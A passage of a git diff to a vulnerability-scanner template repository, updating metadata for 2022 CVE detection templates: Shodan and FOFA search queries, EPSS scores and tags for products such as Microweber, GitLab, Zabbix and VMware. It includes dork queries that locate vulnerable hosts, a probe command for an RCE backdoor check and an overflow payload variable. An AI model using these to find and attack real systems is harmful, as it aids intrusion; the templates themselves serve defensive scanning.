jira_data_center - shodan-query: http.component:"Atlassian Jira" + product: "jira_data_center" + shodan-query: + - "http.component:\"Atlassian Jira\"" + - http.component:"atlassian jira" tags: cve,cve2022,atlassian,jira,exposure,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index fbc9d485a3..a511b1731c 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -23,13 +23,12 @@ info: cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: subtlewebinc product: formcraft3 framework: wordpress - fofa-query: body="formcraft3" && body="wp-" + fofa-query: "body=\"formcraft3\" && body=\"wp-\"" tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 263abc5ea6..f9709be40d 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -24,8 +24,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,microweber,redirect,oss http: diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 62b50a0d98..ad9616a750 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -27,10 +27,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - google-query: inurl:/wp-content/plugins/wp-statistics - publicwww-query: /wp-content/plugins/wp-statistics/ shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: /wp-content/plugins/wp-statistics/ + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 7225f2dcfa..8c4bab886d 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -21,16 +21,20 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0660 cwe-id: CWE-209 - epss-score: 0.00719 - epss-percentile: 0.78502 + epss-score: 0.00585 + epss-percentile: 0.78101 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,microweber,disclosure,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml index 251c13f693..01e3b6c259 100644 --- a/http/cves/2022/CVE-2022-0666.yaml +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -21,8 +21,13 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - tags: cve,cve2023,huntr,crlf,microweber + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - icon_hash=780351152 + - body="microweber" + tags: cve,huntr,crlf,microweber,cve2022 http: - method: GET diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index d478f5973e..2a6b1ee31c 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 2324bd77ac..151a157ceb 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2022,gitlab diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 466c24d3e5..05827444ed 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0785 cwe-id: CWE-89 - epss-score: 0.04043 - epss-percentile: 0.91894 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 2df77716c9..c00020505c 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -26,9 +26,9 @@ info: vendor: ubigeo_de_peru_para_woocommerce_project product: ubigeo_de_peru_para_woocommerce framework: wordpress - publicwww-query: "/wp-content/plugins/ubigeo-peru/" shodan-query: http.html:/wp-content/plugins/ubigeo-peru/ fofa-query: body=/wp-content/plugins/ubigeo-peru/ + publicwww-query: "/wp-content/plugins/ubigeo-peru/" tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project http: diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index 7e3c3efc29..bc06fbf141 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -20,17 +20,19 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 - epss-score: 0.00179 - epss-percentile: 0.54242 + epss-score: 0.00146 + epss-percentile: 0.50533 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2022,ssrf,gogs,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 0629f52cff..85d1490008 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -14,13 +14,14 @@ info: - https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df - https://wordpress.org/plugins/member-hero/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0885 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0885 cwe-id: CWE-862 - epss-score: 0.31455 - epss-percentile: 0.96571 + epss-score: 0.28394 + epss-percentile: 0.96849 cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 48a849cc41..532767f004 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve2022,cve,authenticated,huntr,xss,microweber,cms http: diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index b79d93e52a..9317f3c6ed 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve2022,cve,xss,microweber,huntr http: diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index ef21a9ce0f..68eb0a33e4 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -27,8 +27,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 20f2bab0f9..e2de593779 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -21,14 +21,18 @@ info: cve-id: CVE-2022-0968 cwe-id: CWE-190 epss-score: 0.00076 - epss-percentile: 0.30933 + epss-percentile: 0.32297 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,overflow,microweber,cms,huntr variables: payload: '{{repeat("A", 600)}}' diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 1949e01973..ce4e8f27c4 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: sophos product: sfos - shodan-query: http.title:"Sophos" + shodan-query: + - http.title:"Sophos" + - http.title:"sophos" fofa-query: title="sophos" google-query: intitle:"sophos" tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 8ba495106d..b921105049 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: gitea product: gitea - shodan-query: title:"Gitea" - fofa-query: body="powered by gitea version" + shodan-query: + - title:"Gitea" + - http.html:"powered by gitea version" + - http.title:"gitea" + - cpe:"cpe:2.3:a:gitea:gitea" + fofa-query: + - body="powered by gitea version" + - title="gitea" google-query: intitle:"gitea" tags: cve,cve2022,huntr,open-redirect,gitea diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index bc731d2142..bee7559ba8 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -26,7 +26,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2022,gitlab,packetstorm diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 211707edd9..ff44d4dfc9 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -24,9 +24,9 @@ info: vendor: nootheme product: jobmonster framework: wordpress - publicwww-query: "/wp-content/themes/noo-jobmonster" shodan-query: http.html:/wp-content/themes/noo-jobmonster fofa-query: body=/wp-content/themes/noo-jobmonster + publicwww-query: "/wp-content/themes/noo-jobmonster" tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme http: diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 838d4ff3fe..60dd241a09 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -29,7 +29,7 @@ info: vendor: fusion_builder_project product: fusion_builder framework: wordpress - tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion + tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion,fusion_builder_project http: - raw: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index 31d28239c7..a9494c2fdb 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: f5 product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2022,f5,bigip,rce,mirai,kev diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 35cdd2ebf5..9d4a99d167 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 38f0a91daa..4d191b623b 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -20,12 +20,14 @@ info: cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: freehtmldesigns - product: site_offline + product: "site_offline" framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" - tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp + shodan-query: http.html:/wp-content/plugins/site-offline/ + fofa-query: body=/wp-content/plugins/site-offline/ + tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 0ab0a80386..14ba5d55b4 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -22,9 +22,9 @@ info: cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 2 - vendor: hc_custom_wp-admin_url_project - product: hc_custom_wp-admin_url + max-request: 1 + vendor: "hc_custom_wp-admin_url_project" + product: "hc_custom_wp-admin_url" framework: wordpress tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,hc_custom_wp-admin_url_project diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index 4e6b12b21f..dea30ad832 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -29,7 +29,7 @@ info: vendor: weblizar product: school_management framework: wordpress - tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress + tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 8a33280691..61d599b2e6 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: diagrams product: drawio - shodan-query: http.title:"Flowchart Maker" + shodan-query: + - http.title:"Flowchart Maker" + - http.title:"flowchart maker" fofa-query: title="flowchart maker" google-query: intitle:"flowchart maker" tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index f0d37f6ab5..ef72c6a6d1 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -25,12 +25,11 @@ info: cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 - vendor: simple-membership-plugin - product: simple_membership + max-request: 2 + vendor: "simple-membership-plugin" + product: "simple_membership" framework: wordpress tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index a8e2315764..8bd91c588b 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1756 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36967 + epss-percentile: 0.37623 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,9 +28,9 @@ info: vendor: thenewsletterplugin product: newsletter framework: wordpress - publicwww-query: "/wp-content/plugins/newsletter/" shodan-query: http.html:/wp-content/plugins/newsletter/ fofa-query: body=/wp-content/plugins/newsletter/ + publicwww-query: "/wp-content/plugins/newsletter/" tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress http: diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index b22c6fb154..d6e80f9806 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1815 cwe-id: CWE-918,CWE-200 - epss-score: 0.02327 - epss-percentile: 0.89496 + epss-score: 0.02239 + epss-percentile: 0.8954 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index f8efe05078..eb87787730 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-1883 cwe-id: CWE-89 - epss-score: 0.1005 - epss-percentile: 0.94774 + epss-score: 0.08142 + epss-percentile: 0.94315 cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index c7f69c82e4..7c624a7c6b 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1906 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35299 + epss-percentile: 0.36517 cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 0f74907a07..250b818361 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1910 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46372 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 3c368010a7..5b2a41575f 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1952 cwe-id: CWE-434 - epss-score: 0.93584 - epss-percentile: 0.99051 + epss-score: 0.79729 + epss-percentile: 0.98289 cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,7 +31,6 @@ info: product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental framework: wordpress tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics - variables: string: "CVE-2022-1952" diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index 9f6f1bbebc..9e6f313511 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2022,lfi,weblogic,oracle,packetstorm diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 7ac734b179..853618651c 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -20,15 +20,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-21500 - epss-score: 0.92631 - epss-percentile: 0.98947 + epss-score: 0.93111 + epss-percentile: 0.99046 cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: oracle product: e-business_suite - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + shodan-query: + - http.title:"Login" "X-ORACLE-DMS-ECID" 200 + - http.title:"login" "x-oracle-dms-ecid" 200 fofa-query: title="login" "x-oracle-dms-ecid" 200 google-query: intitle:"login" "x-oracle-dms-ecid" 200 tags: cve,cve2022,oracle,misconfig,auth-bypass diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index d1142b727b..68568a5416 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wordpress product: wordpress - shodan-query: cpe:"cpe:2.3:a:wordpress:wordpress" + shodan-query: + - cpe:"cpe:2.3:a:wordpress:wordpress" + - http.component:"wordpress" tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress http: diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 8c8c4fab1d..4d07749ca7 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,microweber,xss,unauth http: diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index 6e688fe469..51695f9810 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2022,gitlab diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 7d51544452..f5fed52599 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: juniper product: junos - shodan-query: title:"Juniper Web Device Manager" + shodan-query: + - title:"Juniper Web Device Manager" + - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" tags: cve2022,cve,xss,juniper,junos diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index d399f50761..fe125674f0 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -24,11 +24,13 @@ info: cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: verified: true - max-request: 2 + max-request: 4 vendor: apollotheme - product: ap_pagebuilder + product: "ap_pagebuilder" framework: prestashop - shodan-query: http.component:"Prestashop" + shodan-query: + - "http.component:\"Prestashop\"" + - http.component:"prestashop" tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme http: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index 04175f7749..0242bdcd9e 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -21,14 +21,16 @@ info: cve-id: CVE-2022-2290 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: trilium_project product: trilium - shodan-query: title:"Trilium Notes" + shodan-query: + - title:"Trilium Notes" + - http.title:"trilium notes" fofa-query: title="trilium notes" google-query: intitle:"trilium notes" tags: cve,cve2022,xss,trilium,huntr,trilium_project diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 99a003e56f..d35b519f2a 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -28,7 +28,9 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 - fofa-query: icon_hash=-1250474341 + fofa-query: + - icon_hash=-1250474341 + - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti http: diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 2147e6c1c8..4d3fead3ea 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -28,8 +28,11 @@ info: max-request: 3 vendor: vmware product: identity_manager - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" shodan-query: http.favicon.hash:-1250474341 + fofa-query: + - app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + - icon_hash=-1250474341 + - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" tags: cve2022,cve,vmware,auth-bypass,oast http: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 5f1f191f50..2f0900c2e1 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: siemens product: sinema_remote_connect_server - shodan-query: title:"Logon - SINEMA Remote Connect" + shodan-query: + - title:"Logon - SINEMA Remote Connect" + - http.title:"logon - sinema remote connect" fofa-query: title="logon - sinema remote connect" google-query: intitle:"logon - sinema remote connect" tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index 15c48d8da6..3508784879 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -26,8 +26,15 @@ info: max-request: 2 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: app="ZABBIX-监控系统" && body="saml" + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - app="ZABBIX-监控系统" && body="saml" + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index ca2faed997..c289d30fcc 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ 